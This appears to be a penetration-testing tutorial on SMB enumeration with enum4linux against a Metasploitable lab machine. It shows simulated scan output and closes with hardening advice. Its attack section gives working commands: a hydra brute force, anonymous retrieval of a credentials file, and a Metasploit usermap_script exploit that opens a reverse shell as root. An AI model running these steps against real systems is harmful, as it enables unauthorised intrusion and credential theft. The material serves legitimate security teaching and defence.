One of the most frequently targeted protocols for enumeration is SMB (Server Message Block) — a protocol used for file sharing, printer sharing, and communication between devices on Windows networks.
This article is a complete documentation of a practical demo conducted by a penetration tester, using enum4linux as the primary tool for SMB enumeration. All steps will be explained in detail with simulated terminal output, technical analysis, and security implications.
⚠️ IMPORTANT DISCLAIMER: All information in this article is intended for cybersecurity education purposes. Performing enumeration or exploitation against systems without written permission is illegal and can lead to criminal charges. Always use personal labs, VMs, or platforms like HackTheBox/TryHackMe for practice.
What is SMB Enumeration?
SMB Enumeration is the process of gathering information from systems running SMB services (ports 139/tcp and 445/tcp). The information that can be obtained includes:
Tools Used
1. enum4linux
Classic tool for SMB enumeration. Combines functionality from:
nmblookupnet viewsmbclientrpcclient
Installation:
sudo apt update && sudo apt install enum4linux -y2. SMBClient
For manually accessing SMB shares.
3. Nmap
For port scanning and service detection.
4. Metasploit Framework
For advanced exploitation.
Complete Step-by-Step Lab Practice
Phase 0: Lab Setup
Attacker: Kali Linux (192.168.1.100)
Target: Metasploitable 2 (192.168.1.110)Phase 1: Root Access
┌──(user㉿kali)-[~]
└─$ sudo su
[sudo] password for user:
┌──(root㉿kali)-[~]
└─#Why root? Some enum4linux functions require root access for raw sockets and packet crafting.
Phase 2: Target Identification
┌──(root㉿kali)-[~]
└─# ifconfig
eth0: flags=4163 mtu 1500
inet 192.168.1.100 netmask 255.255.255.0 broadcast 192.168.1.255
┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.1.0/24
Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for 192.168.1.110
Host is up (0.0012s latency).✅ Target found: 192.168.1.110
Phase 3: Service Discovery
┌──(root㉿kali)-[~]
└─# nmap -p 139,445 -sV 192.168.1.110
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.x - 4.x (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian📌 Target running Samba 3.0.20 — old and vulnerable version!
Phase 4: Connectivity Test
┌──(root㉿kali)-[~]
└─# ping -c 3 192.168.1.110
PING 192.168.1.110 (192.168.1.110) 56(84) bytes of data.
64 bytes from 192.168.1.110: icmp_seq=1 ttl=64 time=0.85 ms
64 bytes from 192.168.1.110: icmp_seq=2 ttl=64 time=0.79 ms
64 bytes from 192.168.1.110: icmp_seq=3 ttl=64 time=0.91 ms✅ Target reachable — ready for enumeration.
Phase 5: Running enum4linux (Full Scan)
┌──(root㉿kali)-[~]
└─# enum4linux -a 192.168.1.110Flag -a = Perform all enumeration (OS, users, shares, groups, password policy, etc.).
Output Analysis and Data Interpretation
A. Target Information
=====================================
| Target Information |
=====================================
Target ........... 192.168.1.110
RID Range ........ 500-550,1000-1050✅ RID (Relative Identifier) Range: The tool will try every RID to find users.
B. OS Information
=====================================
| OS Information |
=====================================
[+] Got OS info for 192.168.1.110 from smbclient:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]⚠️ CRITICAL: Samba 3.0.20 has vulnerability CVE-2007–2447 (usermap_script) that allows RCE.
C. NetBIOS & Domain Info
=====================================
| NBTstat Information |
=====================================
[+] NetBIOS Name Table:
METASPLOITABLE <00> - B WORKGROUP
METASPLOITABLE <03> - B Messenger Service
METASPLOITABLE <20> - B File Server Service
WORKGROUP <1e> - B Browser Service Elections📌 <20> = File sharing service active. <00> = Workstation service.
D. Session & User Enumeration
=====================================
| Session Check |
=====================================
[+] Attempting to enumerate sessions using SAMR...
User Name : <unknown>
Logon Domain : METASPLOITABLE
=====================================
| User Enumeration |
=====================================
[+] Local Users via SAMR (RID Cycling):
RID: 500, User: administrator
RID: 501, User: nobody
RID: 502, User: klog
RID: 1000, User: root
RID: 1001, User: daemon
RID: 1002, User: bin
RID: 1003, User: sys
RID: 1004, User: sync
RID: 1005, User: games
RID: 1006, User: man
RID: 1007, User: lp
RID: 1008, User: mail
RID: 1009, User: news
RID: 1010, User: uucp
RID: 1011, User: proxy
RID: 1012, User: www-data
RID: 1013, User: backup
RID: 1014, User: list
RID: 1015, User: irc
RID: 1016, User: gnats
RID: 1017, User: nobody
RID: 1018, User: libuuid
RID: 1019, User: dhcp
RID: 1020, User: syslog
RID: 1021, User: klog
RID: 1022, User: sshd
RID: 1023, User: bind
RID: 1024, User: postfix
RID: 1025, User: ftp
RID: 1026, User: postgres
RID: 1027, User: mysql
RID: 1028, User: tomcat55
RID: 1029, User: distccd
RID: 1030, User: user
RID: 1031, User: service
RID: 1032, User: telnetd
RID: 1033, User: proftpd
RID: 1034, User: statd
RID: 2000, User: msfadmin
RID: 2001, User: bind
RID: 2002, User: syslog
RID: 2003, User: postfix
🔥 40+ user accounts identified! This is a goldmine for attackers.
Important Users:
administrator– RID 500 (default admin)root– RID 1000msfadmin– RID 2000 (well-known credentials: msfadmin:msfadmin)postgres,mysql,tomcat55– Service accounts (potential default passwords)
E. Share Enumeration
=====================================
| Share Enumeration |
=====================================
[+] Attempting to enumerate shares using SAMR...
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
[+] Attempting to access shares with anonymous logon:
//192.168.1.110/tmp Mapping: OK, Listing: OK
//192.168.1.110/opt Mapping: OK, Listing: OK
//192.168.1.110/IPC$ [E] Can't browse with anonymous
//192.168.1.110/ADMIN$ [E] Can't browse with anonymous⚠️ CRITICAL: tmp and opt shares are accessible without authentication!
Check Share Contents:
┌──(root㉿kali)-[~]
└─# smbclient //192.168.1.110/tmp -N
Anonymous login successful
smb: \> ls
. D 0 Wed Feb 12 18:30:15 2026
.. D 0 Wed Feb 12 18:30:10 2026
backup.sh A 123 Wed Feb 12 18:25:00 2026
credentials.txt A 450 Wed Feb 12 18:20:30 2026
shell.php A 750 Wed Feb 12 18:15:45 2026📌 Found credentials.txt file — attacker can read it immediately.
F. Password Policy Information
=====================================
| Password Policy Information |
=====================================
[+] Attempting to get password policy via SAMR...
[+] Password policy for domain METASPLOITABLE:
Password min length: 5
Password history length: 0
Password properties: 0x00000000 (DOMAIN_PASSWORD_COMPLEX=0)
Minimum password age: 0 days
Maximum password age: 42 days
Lockout threshold: Not Set
Lockout duration: Not Set
Lockout observation window: Not Set⚠️ CRITICAL:
- No password complexity
- Minimum length only 5 characters
- No lockout policy
Brute force becomes very easy.
Case Study: Vulnerable vs Secure Target
Case 1: Metasploitable (Vulnerable Target)
# Result: FULL INFORMATION OBTAINED
40+ users enumerated
2 anonymous shares
Weak password policy
Legacy Samba version (3.0.20)Case 2: Windows Server 2019 Hardened (Secure Target)
# Result: MINIMAL INFORMATION
=====================================
| Session Check |
=====================================
[-] Null sessions are disabled on this target.
[-] Unable to enumerate users (STATUS_ACCESS_DENIED).
=====================================
| Share Enumeration |
=====================================
[-] Access denied listing shares (requires authentication).📌 Difference: Proper security configuration blocks null sessions and anonymous access.
Post-Enumeration Attack Vectors
After obtaining information from enum4linux, attackers can proceed to the exploitation phase:
1. Brute Force Credential
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt smb://192.168.1.1102. Access Insecure Shares
smbclient //192.168.1.110/tmp -N
get credentials.txt3. Exploit Samba usermap_script (CVE-2007–2447)
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(usermap_script) > set RHOSTS 192.168.1.110
msf6 exploit(usermap_script) > set LHOST 192.168.1.100
msf6 exploit(usermap_script) > exploit
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] Command shell session 1 opened (192.168.1.100:4444 -> 192.168.1.110:37582)
whoami
rootMitigation and Defense
For System Administrators:
- Disable SMBv1 (obsolete and insecure)
Disable-WindowsOptionalFeature -Online -FeatureName smb1protocol2. Disable Null Sessions
- Windows: Set
RestrictNullSessAccess = 1 - Samba: Set
restrict anonymous = 2in smb.conf
3. Enforce Strong Password Policy
- Minimum length ≥ 12 characters
- Enable password complexity
- Set lockout threshold (e.g., 5 attempts)
4. Firewall Rules
- Restrict access to ports 139 & 445 to trusted subnets only
5. Regular Patching
- Samba 3.x is EOL — upgrade to Samba 4.x
- Regular Windows Updates